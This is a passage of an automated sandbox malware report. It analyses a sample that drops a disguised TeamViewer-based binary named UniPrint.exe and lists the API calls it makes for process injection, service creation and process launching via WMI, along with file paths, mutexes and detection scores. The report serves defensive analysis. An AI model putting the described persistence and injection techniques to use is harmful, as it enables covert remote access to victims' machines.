Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 5_2_6E5C8AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB340 NtGetContextThread,NtSetContextThread, 5_2_6E5CB340
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB160 NtProtectVirtualMemory, 5_2_6E5CB160
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C89F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache, 5_2_6E5C89F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB650 RtlMoveMemory,NtFlushInstructionCache, 5_2_6E5CB650
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C26E0 StrChrW,RtlZeroMemory,NtCreateSection,StrChrW,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,StrChrW,NtClose, 5_2_6E5C26E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C27F0 GetFileAttributesW,StrChrW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 5_2_6E5C27F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 5_2_6E5C2FF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 5_2_6E5C2440
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C1C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 5_2_6E5C1C90
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C1570 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 5_2_6E5C1570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C5220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,StrChrW,CloseHandle,CloseHandle,CloseHandle, 5_2_6E5C5220
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C1A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 5_2_6E5C1A80
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CA880 NtQueryVirtualMemory, 5_2_6E5CA880
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB0B9 NtProtectVirtualMemory, 5_2_6E5CB0B9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C1960 NtProtectVirtualMemory, 5_2_6E5C1960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB1A0 NtOpenThread, 5_2_6E5CB1A0
PE file does not import any functions
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTV.dllT vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer.exel& vs wogZe27GBB.exe
PE file contains strange resources
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Section loaded: firewallapi.dll Jump to behavior
Contains functionality to delete services
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C3850 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle, 3_2_6E5C3850
Source: wogZe27GBB.exe Virustotal: Detection: 53%
Source: wogZe27GBB.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\wogZe27GBB.exe File read: C:\Users\user\Desktop\wogZe27GBB.exe Jump to behavior
Source: wogZe27GBB.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\wogZe27GBB.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\wogZe27GBB.exe 'C:\Users\user\Desktop\wogZe27GBB.exe'
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6E5C5F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004C6E36 AdjustTokenPrivileges, 5_2_004C6E36
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_6E5C5F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Local\Temp\nsrC1C9.tmp Jump to behavior
Source: nsrC1CA.tmp.0.dr Binary string: Driver.GetDriverIPAddress.GetAdaptersInfo2.Error = Driver.GetDriverIPAddress.Memory allocation errorDriver.GetDriverIPAddress.GetAdaptersInfo.Error = Driver.NoSubkeys DriverConnector.GetGUIDfromRegistry: RegCloseKey(unit_key) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(component_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(net_cfg_instance_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegCloseKey(adapter_key) failed with error Driver.KeyError ComponentIdDriver.NoRegKey SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}DriverConnector.RemoveIPAddresses: DeleteIPAddress() failed with error DriverConnector.Close: CloseHandle failed\DEVICE\TCPIP_CDriverConnector::Init() GetIndex failed DriverConnector.Init: GetGUIDfromRegistry failedDriverConnector.Open: FlushIpNetTable failed with error DriverConnector.Open: IpRenewAddress failed with error Driver.Invalid.IPDriver.TAP_IOCTL_SET_MEDIA_STATUS.RejectedDriver.GetMAC.FailedDriver.DHCP.Failed1.0.0.7255.0.0.0DriverConnector.Open: DeviceIOControl(MTU) failedDriverConnector.Open: CreateFile failed with error \\.\Global\.dgt
Source: classification engine Classification label: mal72.evad.winEXE@13/7@4/5
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2AC0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,StrChrW,StrChrW,SysAllocString,StrChrW,SysAllocString,SysFreeString,VariantInit,VariantInit,StrChrW,StrChrW,lstrlenW,SysAllocStringLen,PathQuoteSpacesW,VariantInit,StrChrW,SysAllocString,StrChrW,VariantInit,StrChrW,StrChrW,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 3_2_6E5C2AC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle, 3_2_6E5C3DC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle, 5_2_6E5C3DC0
Source: C:\Users\user\Desktop\wogZe27GBB.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,73D5A680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404356
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C9B10 SwitchDesktop,SetThreadDesktop,LoadLibraryW,GetProcessHeap,HeapAlloc,RtlZeroMemory,GetSystemDirectoryW,PathAddBackslashW,lstrcatW,LoadLibraryExW,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,StrChrW,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep, 3_2_6E5C9B10
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C3920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW, 3_2_6E5C3920
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAMOEBAAAA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C5180 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource, 3_2_6E5C5180
Source: C:\Users\user\Desktop\wogZe27GBB.exe File written: C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: wogZe27GBB.exe Static file information: File size 1773472 > 1048576
Source: wogZe27GBB.exe Static PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000002.707742521.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1076091636.000000006E5CC000.00000002.00020000.sdmp, svchost.exe, 00000007.00000002.1072106592.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759626756.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.762333599.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000002.776275044.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.780622367.000000006E5CC000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, nsrC1CA.tmp.0.dr

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053E60D push ecx; ret 5_2_0053E620
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053BD8D push ecx; ret 5_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 11_3_029AFAC6 push eax; ret 11_3_029AFAC9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 11_3_029B24F9 pushfd ; ret 11_3_029B24FA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 11_3_029AFAC6 push eax; ret 11_3_029AFAC9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 11_3_029B24F9 pushfd ; ret 11_3_029B24FA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 12_2_027E6D2C push ds; ret 12_2_027E6D2F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 12_2_027E6FCC push esi; ret 12_2_027E6FCF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 14_3_0285EBC8 push eax; retf 14_3_0285EBC9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 14_3_0282E9D5 push ebp; ret 14_3_0282E9D7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 14_3_0282E35C push ebp; iretd 14_3_0282E35F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 14_3_0282E57C push ecx; retf 14_3_0282E57F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 14_3_0282E9D5 push ebp; ret 14_3_0282E9D7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 14_3_0282E35C push ebp; iretd 14_3_0282E35F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 14_3_0282E57C push ecx; retf 14_3_0282E57F
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405E88

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll Jump to dropped file
